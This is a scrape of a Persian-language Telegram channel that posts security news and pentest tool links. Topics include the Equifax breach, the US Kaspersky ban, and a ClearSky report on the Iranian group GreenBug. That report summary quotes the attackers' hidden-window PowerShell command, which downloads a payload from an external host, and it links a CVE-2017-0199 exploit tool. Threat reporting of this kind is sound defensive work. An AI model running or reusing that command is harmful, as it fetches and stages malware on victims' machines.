امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
وب سایت شخصی بشار اسد توسط هکرهای ترکیه ای دیفیس شد

#news
Yuki Chan The Auto Pentest
ابزار Yuki Chan برای تست نفوذ بصورت اتوماتیک

قابلیت ها:


Automated
Intel-Gathering
Vulnerability Analysis
Security Auditing
OSINT
Tracking
System Enumeration
Fuzzing
CMS Auditing
SSL Security Auditing
And Off Course This Tool Designed For Targetted Pentesting Too



دانلود:

https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest


#pentest
#web
#osint
#enum
#linux
امنیت اطلاعات
دلیل هک شدن equifax!! مسوول امنیت فارغ التحصیل رشته موسیقی هست.
بعد از استعفای برخی مدیران شرکت equifax کاربران در حال شوخی با مدرک مسوول مستعفی امنیت سایت هستن.
(به نظر ایشون مدرک موسیقی از الان دیگه به کار خانم مدیر میاد!)

#fun
سه راه برای وارد شدن به دانشگاه هاروارد از نظر جولیان آسانژ (مالک ویکی لیکس):
رشوه بده
مورد تایید CIA باش (بعد از رد افشاگر CIA،چلسی منینگ برای رفتن به هاروارد)
آسیایی نباش!
چرا Deep Learning
امنیت اطلاعات
دپارتمان امنیت داخلی امریکا، استفاده از محصولات شرکت روس kaspersky رو برای تمام ادارات دولتی ممنوع اعلام کرد. https://securityaffairs.co/wordpress/63013/intelligence/dhs-kaspersky-lab-ban.html #usa #russia #nsa #kaspersky
به گزارش بی بی سی بعد از اعلام بلومبرگ مبنی بر ارسال ایمیل مدیر اجرایی kaspersky به کارمند سابق این شرکت که در اون در مورد یک پروژه امنیتی که با سرویس امنیتی دولت روسیه در حال اجرا هستند توضیح داده ، دولت امریکا استفاده از تمامی محصولات کسپرسکای رو در ادارات دولتی ممنوع اعلام کرد.
کسپرسکای در حال حاضر بیش از ۴۰۰ میلیون مشتری و کاربر در تمام دنیا داره و بلومبرگ اعلام کرده ابزارهای این شرکت نه تنها در مورد حملات سایبری آدرس اشتباهی میدن بلکه هکرهای شناسایی شده در طی این حملات رو به سرویس امنیتی روسیه (FSB) معرفی میکنن.

اما کسپرسکای معتقده این اطلاعات حقیقت نداشته و این شرکت قربانی درگیری و رقابت سیاسی بین این دو کشور هست.

#news
#usa
#russia
#fsb
#nsa
#cia
#kaspersky
کانال پابلیک شد

@sec_nerd
میزان مصرف دیتا به ازای کیفیت های مختلف ویدیو در یوتیوب

@sec_nerd
پلاگین decoder برای افزایش قابلیت های دکدینگ Burp suite

https://github.com/nccgroup/Decoder-Improved

#burpsuite
#decoder
#jar

@sec_nerd
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
شرکت equifax اعلام کرد ۴۰۰ هزار شهروند بریتانیایی با هک شدن این سایت در معرض خطر قرار دارند.

#news
#equifax

@sec_nerd
سایت clearsky در گزارشی، توضیحاتی در مورد فعالیت های گروه ایرانی GreenBug ارائه کرد.این گروه از تروجانی به نام ISMAgent برای آلوده کردن سیستمها استفاده میکنند.ابزار مورد استفاده در این حملات از آسیب پذیری آفیس با کد CVE-2017-0199 استفاده کرده که توضیحات بیشتری در مورد این باگ در https://github.com/bhdresh/CVE-2017-0199 به همراه ابزار مورد نیاز موجود هست. این حمله با فراخوانی ظاهری فایلی به اسم template.rtf و اجرای دستور:
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object https://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘); add-content -path ‘C:\Users\USER\AppData\Roaming/srvRep.txt’ -value $val -force
در پشت صحنه فایل ntluca.txt رو که فایل اصلی این حمله هست دانلود و دکد میکنه (base64 digital certificate) .

توضیحات بیشتر :
https://www.clearskysec.com/ismagent/

#iran
#usa
#ksa
#israel
#russia
#malware
#windows
#greenbug


@sec_nerd